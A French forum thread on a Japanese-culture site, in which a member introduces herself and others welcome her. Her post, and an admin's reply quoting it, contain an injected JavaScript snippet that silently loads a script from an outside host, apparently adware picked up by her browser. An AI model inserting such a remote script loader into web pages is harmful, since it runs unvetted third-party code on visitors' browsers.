La Japonese School - ラJaponeseスクール
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.

La Japonese School - ラJaponeseスクール

Système scolaire, langue et révisions. Le choc des culture (traditionnelles et d'aujourdui), Les Fêtes, Le Tourismes et les Loisirs
 
AccueilRechercherDernières imagesS'enregistrerConnexion
Le Deal du moment :
Manga Chainsaw Man : où acheter le Tome 17 ...
Voir le deal
19.99 €

 

 bonjoue à tous

Aller en bas 
+4
asuka
Miloscorpion
bidib
katsumi
8 participants
AuteurMessage
katsumi
Shusshin かつての生徒 (anciens élèves)
Shusshin かつての生徒 (anciens élèves)
katsumi



bonjoue à tous Empty
MessageSujet: bonjoue à tous   bonjoue à tous Icon_minitimeMar 11 Déc - 16:19

bonjour à tous
je m'appelle prescillia, je suis née en 1988. j'habite le havre. j'adore la culture japonais et ceux depuis quelques années déjà. j'adore les manga et plus particulièrement one piece [Vous devez être inscrit et connecté pour voir cette image]. j'aime aussi la cuisine japonaise et même s'il me reste encore beaucoup à apprendre je travaille dur pour ne pas empoisonner mon homme.

j'aime: one piece, la cuisine, final fantasy et mon homme [Vous devez être inscrit et connecté pour voir cette image]

je n'aime pas: le ménage et la téléréalité ( ça ne devrait pas exister) [Vous devez être inscrit et connecté pour voir cette image]

sur ceux , [Vous devez être inscrit et connecté pour voir cette image] et enchanté d'être parmi vous.(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Revenir en haut Aller en bas
bidib
Shusshin かつての生徒 (anciens élèves)
Shusshin かつての生徒 (anciens élèves)
bidib



bonjoue à tous Empty
MessageSujet: Re: bonjoue à tous   bonjoue à tous Icon_minitimeMer 12 Déc - 10:02

bienvenue
Revenir en haut Aller en bas
Miloscorpion
Kouchou こうちょう (Administrateur)
Kouchou こうちょう (Administrateur)
Miloscorpion



bonjoue à tous Empty
MessageSujet: Re: bonjoue à tous   bonjoue à tous Icon_minitimeMer 12 Déc - 12:47

bienvenue parmi nous katsumi [Vous devez être inscrit et connecté pour voir cette image]
Revenir en haut Aller en bas
asuka
Shusshin かつての生徒 (anciens élèves)
Shusshin かつての生徒 (anciens élèves)
asuka



bonjoue à tous Empty
MessageSujet: Re: bonjoue à tous   bonjoue à tous Icon_minitimeJeu 13 Déc - 12:57

coucou bienvenu ^^[Vous devez être inscrit et connecté pour voir cette image]
Revenir en haut Aller en bas
Yuffie
Kouchou こうちょう (Administrateur)
Kouchou こうちょう (Administrateur)
Yuffie



bonjoue à tous Empty
MessageSujet: Re: bonjoue à tous   bonjoue à tous Icon_minitimeSam 15 Déc - 22:52

Salut ! Bienvenue sur le forum :)
Revenir en haut Aller en bas
ajimu yasuna
Kouchou こうちょう (Administrateur)
Kouchou こうちょう (Administrateur)
ajimu yasuna



bonjoue à tous Empty
MessageSujet: Re: bonjoue à tous   bonjoue à tous Icon_minitimeDim 16 Déc - 10:32

Bienvenue à la Japan school

Tu as un problème visiblement :

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if

(!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}};
header.appendChild(script);} catch(e) {}})();

Dis moi ce que tu veux faire avec cette fonction que je t'arrange cela
Revenir en haut Aller en bas
Idril
Shi purei し ぷれい (Maître des Jeux)
Shi purei し ぷれい (Maître des Jeux)
Idril



bonjoue à tous Empty
MessageSujet: Re: bonjoue à tous   bonjoue à tous Icon_minitimeLun 25 Mar - 20:48

Bienvenue à toi! :D

(Désolée pour ce retard! xC)

Je suis très contente de rencontrer une fan de One Piece et de FF! :3
Je dois dire que nous sommes pareilles sur ces points là! ;)

J'espère que tu te plais bien sur ce petit fofo! :3

Groooos bisous! bonjoue à tous 1688176071
Revenir en haut Aller en bas
soseiseki
Koukousei こうこうせい [lycéens, lycéennes]
Koukousei こうこうせい [lycéens, lycéennes]
soseiseki



bonjoue à tous Empty
MessageSujet: Re: bonjoue à tous   bonjoue à tous Icon_minitimeLun 12 Aoû - 17:17

Walala mais y a plein de nouveau (faut dire que ça fait TRÈS longtemps que je suis pas venue bonjoue à tous 636581 )
Bienvenue très en retard en tout cas !
Revenir en haut Aller en bas
Contenu sponsorisé





bonjoue à tous Empty
MessageSujet: Re: bonjoue à tous   bonjoue à tous Icon_minitime

Revenir en haut Aller en bas
 
bonjoue à tous
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Bonjour à tous
» Salut à tous!
» Bonjour à tous!
» Bonjour à tous et à toutes
» Joyeux NoËL à tous

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
La Japonese School - ラJaponeseスクール  :: Bienvenue à la Japanese school - Welcome to Japanese school :: Inscription au Forum - Forum registration :: Présentation-
Sauter vers: